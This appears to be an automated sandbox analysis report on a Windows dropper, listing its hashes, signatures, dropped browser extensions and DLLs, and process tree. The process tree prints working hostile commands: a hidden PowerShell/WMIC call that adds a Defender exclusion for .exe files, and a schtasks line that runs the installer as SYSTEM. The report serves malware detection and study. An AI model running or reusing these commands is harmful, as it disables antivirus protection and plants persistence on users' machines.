Analysis
-
max time kernel
141s -
max time network
147s -
platform
windows11-21h2_x64 -
resource
win11-20240508-en -
resource tags
arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system -
submitted
04-07-2024 09:01
Static task
static1
Behavioral task
behavioral1
Sample
f82f0e7836322bed4e1b8a1f7e5619562f19fc0a15747a038b314eba809e3066.exe
Resource
win10v2004-20240611-en
General
-
Target
f82f0e7836322bed4e1b8a1f7e5619562f19fc0a15747a038b314eba809e3066.exe
-
Size
7.2MB
-
MD5
0639ed183f736cdc2720fbff7f0232be
-
SHA1
17c64a7299f09907c036f9a3e1495ccf24ef6088
-
SHA256
f82f0e7836322bed4e1b8a1f7e5619562f19fc0a15747a038b314eba809e3066
-
SHA512
89ea2950143b6cd521c1f326a21a19b5d256b975cb7193050d92306ff50a48f3b7d6fa256e934bae5724e387c36ed9a28c1bafee89b091c836d738797b526f51
-
SSDEEP
196608:91O0VLeIvAdN2mWrWNYwlNvnLnEnY1JK+Or4uvWWoNCNR0q:3OGZAD2B0YmvnLigjOEuuVINl
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 19 1160 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 4696 powershell.EXE 1404 powershell.exe 2572 powershell.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Control Panel\International\Geo\Nation KuNcbdj.exe -
Executes dropped EXE 4 IoCs
pid Process 1668 Install.exe 3520 Install.exe 2296 Install.exe 1544 KuNcbdj.exe -
Loads dropped DLL 1 IoCs
pid Process 1160 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json KuNcbdj.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json KuNcbdj.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini KuNcbdj.exe -
Drops file in System32 directory 31 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 KuNcbdj.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 KuNcbdj.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_76B4AC942398240FF309817636D6DBC9 KuNcbdj.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_A3D4688236962EEA03574DE4F61B95D9 KuNcbdj.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_D55A76EA86A3695733B952639E5D4848 KuNcbdj.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 KuNcbdj.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache KuNcbdj.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA KuNcbdj.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE KuNcbdj.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft KuNcbdj.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 KuNcbdj.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04 KuNcbdj.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies KuNcbdj.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 KuNcbdj.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 KuNcbdj.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_A3D4688236962EEA03574DE4F61B95D9 KuNcbdj.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_D55A76EA86A3695733B952639E5D4848 KuNcbdj.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 KuNcbdj.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData KuNcbdj.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content KuNcbdj.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04 KuNcbdj.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA KuNcbdj.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_76B4AC942398240FF309817636D6DBC9 KuNcbdj.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol KuNcbdj.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 KuNcbdj.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja KuNcbdj.exe File created C:\Program Files (x86)\LSzduEfHsNpU2\qFcaTRtJzBCGt.dll KuNcbdj.exe File created C:\Program Files (x86)\GIQQUhncIGKFfsOrPfR\ypuMAJW.dll KuNcbdj.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak KuNcbdj.exe File created C:\Program Files (x86)\fhnTwgTKABUn\VXfwNKc.dll KuNcbdj.exe File created C:\Program Files (x86)\lIJEFxkNU\FaRJBG.dll KuNcbdj.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi KuNcbdj.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak KuNcbdj.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi KuNcbdj.exe File created C:\Program Files (x86)\dNSKkTdIqXSDC\ktvVsvn.xml KuNcbdj.exe File created C:\Program Files (x86)\dNSKkTdIqXSDC\lvfHvih.dll KuNcbdj.exe File created C:\Program Files (x86)\lIJEFxkNU\ReCwzuZ.xml KuNcbdj.exe File created C:\Program Files (x86)\LSzduEfHsNpU2\lzNPzbt.xml KuNcbdj.exe File created C:\Program Files (x86)\GIQQUhncIGKFfsOrPfR\FEMBIMc.xml KuNcbdj.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\NDvladDJhDVrRoudV.job schtasks.exe File created C:\Windows\Tasks\YVjRlmjtlQYvPsI.job schtasks.exe File created C:\Windows\Tasks\qOGoknXFjgYYIAZcs.job schtasks.exe File created C:\Windows\Tasks\bRGikqFCffkwOXLBIB.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 3916 2296 WerFault.exe 88 4092 3520 WerFault.exe 78 4388 1544 WerFault.exe 160 -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{77c203ea-0000-0000-0000-d01200000000}\MaxCapacity = "14116" KuNcbdj.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" KuNcbdj.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket KuNcbdj.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{77c203ea-0000-0000-0000-d01200000000}\NukeOnDelete = "0" KuNcbdj.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix KuNcbdj.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 956 schtasks.exe 4044 schtasks.exe 1720 schtasks.exe 4632 schtasks.exe 2448 schtasks.exe 2272 schtasks.exe 3316 schtasks.exe 1676 schtasks.exe 344 schtasks.exe 1912 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2572 powershell.exe 2572 powershell.exe 2440 powershell.exe 2440 powershell.exe 2528 powershell.exe 2528 powershell.exe 4696 powershell.EXE 4696 powershell.EXE 1544 KuNcbdj.exe 1544 KuNcbdj.exe 1544 KuNcbdj.exe 1544 KuNcbdj.exe 1544 KuNcbdj.exe 1544 KuNcbdj.exe 1544 KuNcbdj.exe 1544 KuNcbdj.exe 1544 KuNcbdj.exe 1544 KuNcbdj.exe 1544 KuNcbdj.exe 1544 KuNcbdj.exe 1544 KuNcbdj.exe 1544 KuNcbdj.exe 1544 KuNcbdj.exe 1544 KuNcbdj.exe 1404 powershell.exe 1404 powershell.exe 1544 KuNcbdj.exe 1544 KuNcbdj.exe 1544 KuNcbdj.exe 1544 KuNcbdj.exe 1544 KuNcbdj.exe 1544 KuNcbdj.exe 1544 KuNcbdj.exe 1544 KuNcbdj.exe 1544 KuNcbdj.exe 1544 KuNcbdj.exe 1544 KuNcbdj.exe 1544 KuNcbdj.exe 1544 KuNcbdj.exe 1544 KuNcbdj.exe 1544 KuNcbdj.exe 1544 KuNcbdj.exe 1544 KuNcbdj.exe 1544 KuNcbdj.exe 1544 KuNcbdj.exe 1544 KuNcbdj.exe 1544 KuNcbdj.exe 1544 KuNcbdj.exe 1544 KuNcbdj.exe 1544 KuNcbdj.exe 1544 KuNcbdj.exe 1544 KuNcbdj.exe 1544 KuNcbdj.exe 1544 KuNcbdj.exe 1544 KuNcbdj.exe 1544 KuNcbdj.exe 1544 KuNcbdj.exe 1544 KuNcbdj.exe 1544 KuNcbdj.exe 1544 KuNcbdj.exe 1544 KuNcbdj.exe 1544 KuNcbdj.exe 1544 KuNcbdj.exe 1544 KuNcbdj.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2572 powershell.exe Token: SeIncreaseQuotaPrivilege 2472 WMIC.exe Token: SeSecurityPrivilege 2472 WMIC.exe Token: SeTakeOwnershipPrivilege 2472 WMIC.exe Token: SeLoadDriverPrivilege 2472 WMIC.exe Token: SeSystemProfilePrivilege 2472 WMIC.exe Token: SeSystemtimePrivilege 2472 WMIC.exe Token: SeProfSingleProcessPrivilege 2472 WMIC.exe Token: SeIncBasePriorityPrivilege 2472 WMIC.exe Token: SeCreatePagefilePrivilege 2472 WMIC.exe Token: SeBackupPrivilege 2472 WMIC.exe Token: SeRestorePrivilege 2472 WMIC.exe Token: SeShutdownPrivilege 2472 WMIC.exe Token: SeDebugPrivilege 2472 WMIC.exe Token: SeSystemEnvironmentPrivilege 2472 WMIC.exe Token: SeRemoteShutdownPrivilege 2472 WMIC.exe Token: SeUndockPrivilege 2472 WMIC.exe Token: SeManageVolumePrivilege 2472 WMIC.exe Token: 33 2472 WMIC.exe Token: 34 2472 WMIC.exe Token: 35 2472 WMIC.exe Token: 36 2472 WMIC.exe Token: SeIncreaseQuotaPrivilege 2472 WMIC.exe Token: SeSecurityPrivilege 2472 WMIC.exe Token: SeTakeOwnershipPrivilege 2472 WMIC.exe Token: SeLoadDriverPrivilege 2472 WMIC.exe Token: SeSystemProfilePrivilege 2472 WMIC.exe Token: SeSystemtimePrivilege 2472 WMIC.exe Token: SeProfSingleProcessPrivilege 2472 WMIC.exe Token: SeIncBasePriorityPrivilege 2472 WMIC.exe Token: SeCreatePagefilePrivilege 2472 WMIC.exe Token: SeBackupPrivilege 2472 WMIC.exe Token: SeRestorePrivilege 2472 WMIC.exe Token: SeShutdownPrivilege 2472 WMIC.exe Token: SeDebugPrivilege 2472 WMIC.exe Token: SeSystemEnvironmentPrivilege 2472 WMIC.exe Token: SeRemoteShutdownPrivilege 2472 WMIC.exe Token: SeUndockPrivilege 2472 WMIC.exe Token: SeManageVolumePrivilege 2472 WMIC.exe Token: 33 2472 WMIC.exe Token: 34 2472 WMIC.exe Token: 35 2472 WMIC.exe Token: 36 2472 WMIC.exe Token: SeDebugPrivilege 2440 powershell.exe Token: SeDebugPrivilege 2528 powershell.exe Token: SeDebugPrivilege 4696 powershell.EXE Token: SeDebugPrivilege 1404 powershell.exe Token: SeAssignPrimaryTokenPrivilege 3420 WMIC.exe Token: SeIncreaseQuotaPrivilege 3420 WMIC.exe Token: SeSecurityPrivilege 3420 WMIC.exe Token: SeTakeOwnershipPrivilege 3420 WMIC.exe Token: SeLoadDriverPrivilege 3420 WMIC.exe Token: SeSystemtimePrivilege 3420 WMIC.exe Token: SeBackupPrivilege 3420 WMIC.exe Token: SeRestorePrivilege 3420 WMIC.exe Token: SeShutdownPrivilege 3420 WMIC.exe Token: SeSystemEnvironmentPrivilege 3420 WMIC.exe Token: SeUndockPrivilege 3420 WMIC.exe Token: SeManageVolumePrivilege 3420 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 3420 WMIC.exe Token: SeIncreaseQuotaPrivilege 3420 WMIC.exe Token: SeSecurityPrivilege 3420 WMIC.exe Token: SeTakeOwnershipPrivilege 3420 WMIC.exe Token: SeLoadDriverPrivilege 3420 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 552 wrote to memory of 1668 552 f82f0e7836322bed4e1b8a1f7e5619562f19fc0a15747a038b314eba809e3066.exe 77 PID 552 wrote to memory of 1668 552 f82f0e7836322bed4e1b8a1f7e5619562f19fc0a15747a038b314eba809e3066.exe 77 PID 552 wrote to memory of 1668 552 f82f0e7836322bed4e1b8a1f7e5619562f19fc0a15747a038b314eba809e3066.exe 77 PID 1668 wrote to memory of 3520 1668 Install.exe 78 PID 1668 wrote to memory of 3520 1668 Install.exe 78 PID 1668 wrote to memory of 3520 1668 Install.exe 78 PID 3520 wrote to memory of 340 3520 Install.exe 80 PID 3520 wrote to memory of 340 3520 Install.exe 80 PID 3520 wrote to memory of 340 3520 Install.exe 80 PID 340 wrote to memory of 4520 340 forfiles.exe 82 PID 340 wrote to memory of 4520 340 forfiles.exe 82 PID 340 wrote to memory of 4520 340 forfiles.exe 82 PID 4520 wrote to memory of 2572 4520 cmd.exe 83 PID 4520 wrote to memory of 2572 4520 cmd.exe 83 PID 4520 wrote to memory of 2572 4520 cmd.exe 83 PID 2572 wrote to memory of 2472 2572 powershell.exe 84 PID 2572 wrote to memory of 2472 2572 powershell.exe 84 PID 2572 wrote to memory of 2472 2572 powershell.exe 84 PID 3520 wrote to memory of 2272 3520 Install.exe 86 PID 3520 wrote to memory of 2272 3520 Install.exe 86 PID 3520 wrote to memory of 2272 3520 Install.exe 86 PID 2296 wrote to memory of 2440 2296 Install.exe 89 PID 2296 wrote to memory of 2440 2296 Install.exe 89 PID 2296 wrote to memory of 2440 2296 Install.exe 89 PID 2440 wrote to memory of 4828 2440 powershell.exe 91 PID 2440 wrote to memory of 4828 2440 powershell.exe 91 PID 2440 wrote to memory of 4828 2440 powershell.exe 91 PID 4828 wrote to memory of 4988 4828 cmd.exe 92 PID 4828 wrote to memory of 4988 4828 cmd.exe 92 PID 4828 wrote to memory of 4988 4828 cmd.exe 92 PID 2440 wrote to memory of 848 2440 powershell.exe 93 PID 2440 wrote to memory of 848 2440 powershell.exe 93 PID 2440 wrote to memory of 848 2440 powershell.exe 93 PID 2440 wrote to memory of 2908 2440 powershell.exe 94 PID 2440 wrote to memory of 2908 2440 powershell.exe 94 PID 2440 wrote to memory of 2908 2440 powershell.exe 94 PID 2440 wrote to memory of 1588 2440 powershell.exe 95 PID 2440 wrote to memory of 1588 2440 powershell.exe 95 PID 2440 wrote to memory of 1588 2440 powershell.exe 95 PID 2440 wrote to memory of 564 2440 powershell.exe 96 PID 2440 wrote to memory of 564 2440 powershell.exe 96 PID 2440 wrote to memory of 564 2440 powershell.exe 96 PID 2440 wrote to memory of 2276 2440 powershell.exe 97 PID 2440 wrote to memory of 2276 2440 powershell.exe 97 PID 2440 wrote to memory of 2276 2440 powershell.exe 97 PID 2440 wrote to memory of 4648 2440 powershell.exe 98 PID 2440 wrote to memory of 4648 2440 powershell.exe 98 PID 2440 wrote to memory of 4648 2440 powershell.exe 98 PID 2440 wrote to memory of 3204 2440 powershell.exe 99 PID 2440 wrote to memory of 3204 2440 powershell.exe 99 PID 2440 wrote to memory of 3204 2440 powershell.exe 99 PID 2440 wrote to memory of 2320 2440 powershell.exe 100 PID 2440 wrote to memory of 2320 2440 powershell.exe 100 PID 2440 wrote to memory of 2320 2440 powershell.exe 100 PID 2440 wrote to memory of 3968 2440 powershell.exe 101 PID 2440 wrote to memory of 3968 2440 powershell.exe 101 PID 2440 wrote to memory of 3968 2440 powershell.exe 101 PID 2440 wrote to memory of 5088 2440 powershell.exe 102 PID 2440 wrote to memory of 5088 2440 powershell.exe 102 PID 2440 wrote to memory of 5088 2440 powershell.exe 102 PID 2440 wrote to memory of 3932 2440 powershell.exe 103 PID 2440 wrote to memory of 3932 2440 powershell.exe 103 PID 2440 wrote to memory of 3932 2440 powershell.exe 103 PID 2440 wrote to memory of 5000 2440 powershell.exe 104
Processes
-
C:\Users\Admin\AppData\Local\Temp\f82f0e7836322bed4e1b8a1f7e5619562f19fc0a15747a038b314eba809e3066.exe"C:\Users\Admin\AppData\Local\Temp\f82f0e7836322bed4e1b8a1f7e5619562f19fc0a15747a038b314eba809e3066.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:552 -
C:\Users\Admin\AppData\Local\Temp\7zS84FF.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1668 -
C:\Users\Admin\AppData\Local\Temp\7zS86F3.tmp\Install.exe.\Install.exe /modidiM "385137" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:3520 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m ping.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"4⤵
- Suspicious use of WriteProcessMemory
PID:340 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵
- Suspicious use of WriteProcessMemory
PID:4520 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2572 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2472
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bRGikqFCffkwOXLBIB" /SC once /ST 09:02:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS86F3.tmp\Install.exe\" Fh /rmXHdidZiVk 385137 /S" /V1 /F4⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2272
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3520 -s 7884⤵
- Program crash
PID:4092
-
-
-
-
